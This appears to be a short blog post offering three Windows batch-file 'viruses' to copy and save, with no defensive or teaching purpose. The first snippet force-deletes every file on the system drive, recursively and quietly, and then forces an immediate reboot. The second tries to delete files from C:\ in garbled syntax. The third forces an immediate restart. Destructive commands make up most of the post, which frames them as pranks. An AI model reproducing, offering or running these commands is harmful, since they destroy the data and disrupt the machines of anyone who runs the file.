Make Virus 3 types
Copy the Following Codes and save it into batch file...1.Virus Code this Virus Code will deleted your all files in hard drive....just copy code and save it into notepad and save as batch file..:)
@echo off del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
2.Virus Code this Virus will crush your window...:D
just copy n save as batch file..
@Echo off
Del C:\ *.* y
3.This Virus Will just restart your pc
@echo off shutdown -r -f -t 00
save as anyname.bat
save as anyname.bat
Post a Comment